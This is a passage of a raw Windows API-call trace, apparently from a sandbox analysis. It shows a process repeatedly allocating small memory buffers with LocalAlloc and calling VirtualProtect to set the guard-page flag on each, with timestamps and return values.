| out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.129] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x6c24f0 [0206.129] VirtualProtect (in: lpAddress=0x6c24f0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.129] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x6bf460 [0206.129] VirtualProtect (in: lpAddress=0x6bf460, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.130] LocalAlloc (uFlags=0x40, uBytes=0x3) returned 0x6bf760 [0206.130] VirtualProtect (in: lpAddress=0x6bf760, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.130] LocalAlloc (uFlags=0x40, uBytes=0x6) returned 0x6c0ea8 [0206.130] VirtualProtect (in: lpAddress=0x6c0ea8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.132] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c2400 [0206.132] VirtualProtect (in: lpAddress=0x6c2400, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.133] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6c4900 [0206.133] VirtualProtect (in: lpAddress=0x6c4900, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.133] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c2280 [0206.133] VirtualProtect (in: lpAddress=0x6c2280, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.134] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c22f8 [0206.134] VirtualProtect (in: lpAddress=0x6c22f8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.135] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6c22c8 [0206.135] VirtualProtect (in: lpAddress=0x6c22c8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.136] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c2460 [0206.136] VirtualProtect (in: lpAddress=0x6c2460, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.137] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x6c0e08 [0206.137] VirtualProtect (in: lpAddress=0x6c0e08, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.137] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6c4800 [0206.137] VirtualProtect (in: lpAddress=0x6c4800, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.138] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6c23e8 [0206.138] VirtualProtect (in: lpAddress=0x6c23e8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.138] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6c24a8 [0206.139] VirtualProtect (in: lpAddress=0x6c24a8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.139] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c2328 [0206.140] VirtualProtect (in: lpAddress=0x6c2328, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.140] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6c2340 [0206.140] VirtualProtect (in: lpAddress=0x6c2340, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.141] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6c2418 [0206.141] VirtualProtect (in: lpAddress=0x6c2418, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.144] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c24d8 [0206.144] VirtualProtect (in: lpAddress=0x6c24d8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.151] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6c2250 [0206.151] VirtualProtect (in: lpAddress=0x6c2250, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.152] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6c2268 [0206.152] VirtualProtect (in: lpAddress=0x6c2268, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.154] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6c2298 [0206.154] VirtualProtect (in: lpAddress=0x6c2298, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.155] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6c22b0 [0206.155] VirtualProtect (in: lpAddress=0x6c22b0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.156] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6c2358 [0206.156] VirtualProtect (in: lpAddress=0x6c2358, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.160] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x6c47a0 [0206.160] VirtualProtect (in: lpAddress=0x6c47a0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.161] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x6c0ed8 [0206.161] VirtualProtect (in: lpAddress=0x6c0ed8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.162] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c2550 [0206.162] VirtualProtect (in: lpAddress=0x6c2550, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.163] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x6c4740 [0206.163] VirtualProtect (in: lpAddress=0x6c4740, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.164] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x6c0e38 [0206.164] VirtualProtect (in: lpAddress=0x6c0e38, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.165] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6c2580 [0206.165] VirtualProtect (in: lpAddress=0x6c2580, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.166] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6c4720 [0206.166] VirtualProtect (in: lpAddress=0x6c4720, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.167] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x6c4a80 [0206.168] VirtualProtect (in: lpAddress=0x6c4a80, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.168] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x6c4a20 [0206.168] VirtualProtect (in: lpAddress=0x6c4a20, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.171] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x6c25b0 [0206.171] VirtualProtect (in: lpAddress=0x6c25b0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.174] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c25c8 [0206.174] VirtualProtect (in: lpAddress=0x6c25c8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.195] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c2598 [0206.195] VirtualProtect (in: lpAddress=0x6c2598, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.200] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c2508 [0206.200] VirtualProtect (in: lpAddress=0x6c2508, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.201] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x6c4820 [0206.202] VirtualProtect (in: lpAddress=0x6c4820, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.203] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6c2568 [0206.203] VirtualProtect (in: lpAddress=0x6c2568, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.204] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c2520 [0206.204] VirtualProtect (in: lpAddress=0x6c2520, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.204] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c2538 [0206.205] VirtualProtect (in: lpAddress=0x6c2538, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.205] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6c4840 [0206.205] VirtualProtect (in: lpAddress=0x6c4840, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.206] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x6c0f88 [0206.206] VirtualProtect (in: lpAddress=0x6c0f88, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.207] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6c49c0 [0206.207] VirtualProtect (in: lpAddress=0x6c49c0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.207] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6c46c0 [0206.207] VirtualProtect (in: lpAddress=0x6c46c0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.208] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x6c0e48 [0206.208] VirtualProtect (in: lpAddress=0x6c0e48, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.209] LocalAlloc (uFlags=0x40, uBytes=0x1f) returned 0x6baac8 [0206.209] VirtualProtect (in: lpAddress=0x6baac8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.210] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6c5180 [0206.210] VirtualProtect (in: lpAddress=0x6c5180, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.211] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6c0e68 [0206.211] VirtualProtect (in: lpAddress=0x6c0e68, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.216] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x6c0eb8 [0206.216] VirtualProtect (in: lpAddress=0x6c0eb8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.220] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x6c0f48 [0206.220] VirtualProtect (in: lpAddress=0x6c0f48, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.223] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x6c5090 [0206.223] VirtualProtect (in: lpAddress=0x6c5090, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.225] LocalAlloc (uFlags=0x40, uBytes=0x6) returned 0x6c0fc8 [0206.225] VirtualProtect (in: lpAddress=0x6c0fc8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.228] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6c0e58 [0206.228] VirtualProtect (in: lpAddress=0x6c0e58, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.229] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c4f28 [0206.229] VirtualProtect (in: lpAddress=0x6c4f28, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.232] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6c50a8 [0206.232] VirtualProtect (in: lpAddress=0x6c50a8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.233] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6c0ec8 [0206.233] VirtualProtect (in: lpAddress=0x6c0ec8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.234] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x6baaf0 [0206.234] VirtualProtect (in: lpAddress=0x6baaf0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.235] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6c5168 [0206.235] VirtualProtect (in: lpAddress=0x6c5168, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.235] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6c5078 [0206.235] VirtualProtect (in: lpAddress=0x6c5078, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.237] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c4ee0 [0206.237] VirtualProtect (in: lpAddress=0x6c4ee0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.238] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6c4f70 [0206.238] VirtualProtect (in: lpAddress=0x6c4f70, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.240] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6c5108 [0206.240] VirtualProtect (in: lpAddress=0x6c5108, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.241] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6c4880 [0206.241] VirtualProtect (in: lpAddress=0x6c4880, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.241] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c4f88 [0206.242] VirtualProtect (in: lpAddress=0x6c4f88, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.242] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x6c0ef8 [0206.242] VirtualProtect (in: lpAddress=0x6c0ef8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.243] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x6c0e78 [0206.243] VirtualProtect (in: lpAddress=0x6c0e78, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.244] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x6c0f08 [0206.244] VirtualProtect (in: lpAddress=0x6c0f08, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.248] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c4fe8 [0206.248] VirtualProtect (in: lpAddress=0x6c4fe8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.250] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6c51b0 [0206.250] VirtualProtect (in: lpAddress=0x6c51b0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.251] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c4ec8 [0206.251] VirtualProtect (in: lpAddress=0x6c4ec8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.252] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c4fa0 [0206.252] VirtualProtect (in: lpAddress=0x6c4fa0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.256] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c4f58 [0206.256] VirtualProtect (in: lpAddress=0x6c4f58, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.257] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6c4fb8 [0206.257] VirtualProtect (in: lpAddress=0x6c4fb8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.260] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c5198 [0206.260] VirtualProtect (in: lpAddress=0x6c5198, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.261] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c4f10 [0206.261] VirtualProtect (in: lpAddress=0x6c4f10, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.262] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c4ef8 [0206.262] VirtualProtect (in: lpAddress=0x6c4ef8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.263] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c5018 [0206.263] VirtualProtect (in: lpAddress=0x6c5018, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.263] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c5000 [0206.263] VirtualProtect (in: lpAddress=0x6c5000, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.269] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c4f40 [0206.269] VirtualProtect (in: lpAddress=0x6c4f40, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.270] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c4fd0 [0206.270] VirtualProtect (in: lpAddress=0x6c4fd0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.273] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c5030 [0206.273] VirtualProtect (in: lpAddress=0x6c5030, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.276] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c5138 [0206.276] VirtualProtect (in: lpAddress=0x6c5138, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.276] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c5048 [0206.277] VirtualProtect (in: lpAddress=0x6c5048, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.280] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6c5060 [0206.280] VirtualProtect (in: lpAddress=0x6c5060, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.281] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6c50c0 [0206.281] VirtualProtect (in: lpAddress=0x6c50c0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.284] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6c50d8 [0206.284] VirtualProtect (in: lpAddress=0x6c50d8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.286] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6c5150 [0206.286] VirtualProtect (in: lpAddress=0x6c5150, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.288] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c5120 [0206.288] VirtualProtect (in: lpAddress=0x6c5120, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.289] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6c50f0 [0206.289] VirtualProtect (in: lpAddress=0x6c50f0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.291] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c5228 [0206.291] VirtualProtect (in: lpAddress=0x6c5228, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.292] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x6c48a0 [0206.292] VirtualProtect (in: lpAddress=0x6c48a0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.292] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c51c8 [0206.293] VirtualProtect (in: lpAddress=0x6c51c8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.293] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x6c48c0 [0206.293] VirtualProtect (in: lpAddress=0x6c48c0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.294] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x6bab18 [0206.294] VirtualProtect (in: lpAddress=0x6bab18, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.295] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c5288 [0206.295] VirtualProtect (in: lpAddress=0x6c5288, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.296] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6c4940 [0206.296] VirtualProtect (in: lpAddress=0x6c4940, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.297] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6c51f8 [0206.297] VirtualProtect (in: lpAddress=0x6c51f8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.298] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6c4760 [0206.298] VirtualProtect (in: lpAddress=0x6c4760, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.298] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6c5210 [0206.299] VirtualProtect (in: lpAddress=0x6c5210, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.299] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c51e0 [0206.299] VirtualProtect (in: lpAddress=0x6c51e0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.355] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6c5240 [0206.356] VirtualProtect (in: lpAddress=0x6c5240, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.357] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6c5258 [0206.357] VirtualProtect (in: lpAddress=0x6c5258, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.357] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x6c47c0 [0206.358] VirtualProtect (in: lpAddress=0x6c47c0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.358] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6c5270 [0206.358] VirtualProtect (in: lpAddress=0x6c5270, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.359] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6c5630 [0206.359] VirtualProtect (in: lpAddress=0x6c5630, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.359] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c5798 [0206.359] VirtualProtect (in: lpAddress=0x6c5798, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.360] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6c49a0 [0206.360] VirtualProtect (in: lpAddress=0x6c49a0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.363] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c55e8 [0206.363] VirtualProtect (in: lpAddress=0x6c55e8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.364] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c5618 [0206.364] VirtualProtect (in: lpAddress=0x6c5618, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.365] 